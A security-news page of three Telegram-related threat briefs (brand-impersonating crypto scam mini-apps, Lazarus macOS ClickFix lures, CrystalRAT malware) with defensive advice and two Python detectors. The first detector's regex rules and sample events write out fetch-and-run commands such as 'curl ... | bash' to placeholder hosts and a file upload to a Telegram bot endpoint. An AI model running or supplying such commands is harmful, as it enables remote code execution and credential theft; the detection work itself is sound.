Last updated: May 14, 2026 at 10:49 AM UTC
Tag: telegram (3 articles)

Scammers used Telegram's built-in mini-apps to impersonate Apple, NVIDIA, and Disney for crypto fraud and Android malware - all running on the same backend

CTM360 disclosed a large-scale fraud platform called FEMITBOT that uses Telegram's Mini App feature to host crypto scams, impersonate major brands, and distribute Android malware. The platform impersonates Apple, Coca-Cola, Disney, eBay, IBM, NVIDIA, BBC, and others - all backed by the same shared infrastructure identified by a common API response. The mini-apps display fake balances, countdown timers, and limited-time offers inside Telegram's WebView. Some campaigns push fake Android APKs hosted on the same domain as the API to ensure valid TLS certificates. Meta and TikTok tracking pixels measure conversion rates.

Check
Brief staff that any Telegram bot promoting cryptocurrency investments, asking them to deposit funds, or prompting them to install an APK is fraud - regardless of which brand the bot claims to represent.
Affected
Telegram users worldwide who interact with bots claiming to represent major brands. The risk is most acute for cryptocurrency-curious users targeted by 'investment opportunity' lures, and for Android users who sideload APKs from Telegram-shared links. Organizations whose brand is impersonated face customer-trust damage even though the compromise happens on the user's side, not in company systems.
Fix
Block sideloading of APKs on managed Android devices and require Google Play Protect to remain enabled. For brand protection teams: monitor Telegram for bots using your company name and report them via Telegram's official channels, though the platform's Mini App vetting is essentially nonexistent, so reactive moderation is the only path. Treat any 'official' Telegram bot as unverified by default.

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy and paste a command into the macOS Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates them over the Telegram Bot API. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

Check
Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected
macOS users in executive, finance, business development, and partner-relations roles, particularly those who use Telegram for business. The technique works because the user runs the command themselves, which bypasses most preventive controls, including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix
Train executives never to paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal-spawned shells that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes that spin in tight loops while holding Keychain access. Consider Lockdown Mode for high-risk roles.
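The detection advice above (alert on Terminal-spawned shells that fetch and run remote content, plus the Telegram Bot API exfil path) is concrete enough to turn into a rule set. The following is an added example written for this page, not code from ANY.RUN, Dark Reading, or the Mach-O Man kit itself. It assumes process events in a simple parent/name/cmdline shape, as an EDR or osquery process_events export would provide; the sample events, hostnames, and bot token are constructed placeholders, not real indicators.

```python
import re

# Interactive terminal emulators on macOS. A ClickFix lure needs the victim
# to paste the command into one of these, so the parent name scopes the alert.
INTERACTIVE_TERMINALS = {"Terminal", "iTerm2", "Alacritty", "kitty", "Hyper"}

# Each rule names one "fetch remote content and execute it" shape. Order only
# decides which rule name is reported when several could match one line.
RULES = [
    # curl/wget output piped straight into an interpreter: curl ... | bash
    ("fetch_piped_to_interpreter",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|osascript|python3?)\b")),
    # fetched text executed via command substitution: bash -c "$(curl ...)"
    ("fetch_in_command_substitution",
     re.compile(r"(\$\(|`)\s*(curl|wget)\b")),
    # inline base64 blob decoded into a shell (macOS base64 uses -D, GNU -d)
    ("base64_decode_piped_to_shell",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(bash|sh|zsh)\b")),
    # direct upload to a Telegram bot endpoint from a shell: the exfil channel
    # the article attributes to Mach-O Man (token segment is <bot><token>)
    ("telegram_bot_api_from_shell",
     re.compile(r"api\.telegram\.org/bot[^/\s]+/(sendDocument|sendMessage)")),
]


def classify(event, parents=INTERACTIVE_TERMINALS):
    """Return the name of the first rule the event's command line matches,
    or None. `parents` restricts alerting to the given parent process names;
    pass None to match regardless of parent."""
    if parents is not None and event["parent"] not in parents:
        return None
    for name, pattern in RULES:
        if pattern.search(event["cmdline"]):
            return name
    return None


def scan(events, parents=INTERACTIVE_TERMINALS):
    """Run classify() over a list of events; return (index, rule, parent)
    tuples for every hit, in event order."""
    hits = []
    for i, ev in enumerate(events):
        rule = classify(ev, parents)
        if rule:
            hits.append((i, rule, ev["parent"]))
    return hits


# Constructed sample events (not real telemetry). Hostnames and the bot
# token are placeholders chosen for illustration only.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "name": "bash",
     "cmdline": "curl -fsSL https://zoom-fix.example/fix.sh | bash"},
    {"parent": "Terminal", "name": "zsh",
     "cmdline": 'bash -c "$(curl -s https://meet-support.example/run)"'},
    {"parent": "Terminal", "name": "osascript",
     "cmdline": "osascript -e 'do shell script \"curl https://teams-update.example/a | sh\"'"},
    {"parent": "Terminal", "name": "bash",
     "cmdline": "echo aGVsbG8= | base64 -D | sh"},
    {"parent": "Terminal", "name": "curl",
     "cmdline": "curl -s -F document=@/tmp/k.zip https://api.telegram.org/bot123456:PLACEHOLDER/sendDocument"},
    # benign: download only, nothing is executed
    {"parent": "Terminal", "name": "curl",
     "cmdline": "curl -O https://example.com/report.pdf"},
    # same fetch-and-run shape, but spawned by a daemon rather than a terminal
    {"parent": "launchd", "name": "bash",
     "cmdline": "curl -s https://internal.example/health | bash"},
    {"parent": "iTerm2", "name": "zsh", "cmdline": "git pull"},
]

if __name__ == "__main__":
    for idx, rule, parent in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} (parent {parent})")
```

With the default parent scope the five ClickFix-shaped events fire and the daemon-spawned `curl | bash` does not; passing `parents=None` widens the rule to every process tree, which is noisier but catches the same pattern when the kit is re-launched from a persistence mechanism rather than from the victim's terminal.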

CrystalRAT malware-as-a-service sells remote access, crypto theft, and keylogging on Telegram

Kaspersky researchers uncovered CrystalRAT, a new malware-as-a-service sold via Telegram and promoted on YouTube with a tiered subscription model. Built in Go, it combines remote access via VNC, keylogging, clipboard hijacking for crypto wallet theft, browser credential stealing from Chromium, Yandex, and Opera, and data harvesting from Steam, Discord, and Telegram. Each buyer receives a build uniquely encrypted with ChaCha20, which makes signature-based detection harder. Kaspersky warns that new versions are still shipping and that the victim count is likely to grow.

Check
Alert staff about fake software cracks and activators - the most common delivery vector for CrystalRAT infections.
Affected
Windows users who download software from unofficial sources. Current victims are primarily in Russia, but the MaaS model means geographic expansion is expected.
Fix
Block known CrystalRAT C2 infrastructure at the network level. Ensure endpoint detection tools are updated with Kaspersky's published IOCs. Train staff to verify crypto wallet addresses before confirming transfers, since clipboard hijacking swaps addresses silently.
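The clipboard-hijacking behaviour described above has a simple observable signature: the victim copies a wallet address and, within a fraction of a second, the clipboard holds a different address of the same coin family. The following is an added example written for this page, not code from Kaspersky or from CrystalRAT; it assumes a list of polled clipboard snapshots as input, uses deliberately loose address patterns for ETH and the two common BTC formats, treats a two-second window as the "swap happened without the user" heuristic, and the addresses and snapshots are synthetic.

```python
import re

# Loose address shapes, enough to separate "looks like a wallet address" from
# ordinary clipboard text. Assumption: these are the families a clipper targets.
ADDRESS_PATTERNS = {
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "btc_legacy": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{25,87}$"),
}


def address_type(text):
    """Return the address family `text` resembles, or None."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def detect_clipboard_swaps(snapshots, max_gap_seconds=2.0):
    """`snapshots` is a list of (timestamp_seconds, clipboard_text) taken by a
    polling loop, in order. A clipper rewrites the clipboard almost at once
    after the victim copies an address, substituting another address of the
    same family, so flag every consecutive pair where both entries are
    addresses of one family, the text changed, and the change landed within
    `max_gap_seconds` (assumed threshold for 'faster than a human')."""
    findings = []
    for (t_prev, prev), (t_cur, cur) in zip(snapshots, snapshots[1:]):
        kind = address_type(prev)
        if kind is None or prev.strip() == cur.strip():
            continue
        if address_type(cur) == kind and (t_cur - t_prev) <= max_gap_seconds:
            findings.append({
                "coin": kind,
                "copied": prev.strip(),
                "replaced_with": cur.strip(),
                "gap_seconds": round(t_cur - t_prev, 3),
            })
    return findings


# Constructed poll history (not real telemetry); addresses are synthetic.
VICTIM_ETH = "0x" + "a" * 40
ATTACKER_ETH = "0x" + "b" * 40
SNAPSHOTS = [
    (0.0, "agenda for Thursday"),
    (1.0, VICTIM_ETH),            # user copies their own deposit address
    (1.3, ATTACKER_ETH),          # clipper rewrites it 300 ms later
    (10.0, ATTACKER_ETH),         # clipboard still holds the attacker's address
    (20.0, "bc1q" + "z" * 38),    # user copies a BTC address
    (45.0, "bc1q" + "y" * 38),    # user copies a different one 25 s later: human pace
    (60.0, "lunch?"),
]

if __name__ == "__main__":
    for hit in detect_clipboard_swaps(SNAPSHOTS):
        print(f"{hit['coin']}: {hit['copied']} -> {hit['replaced_with']} "
              f"after {hit['gap_seconds']} s")
```

Only the ETH pair is reported: the two BTC addresses differ but arrive 25 seconds apart, which is what a person re-copying looks like. To run this against a live host, feed `detect_clipboard_swaps` from a loop that reads the clipboard every few hundred milliseconds (for example `Get-Clipboard` on Windows, where the current CrystalRAT victims are, or `pbpaste` on macOS) and records `(time.monotonic(), text)`; the detector is deliberately independent of how the snapshots are collected.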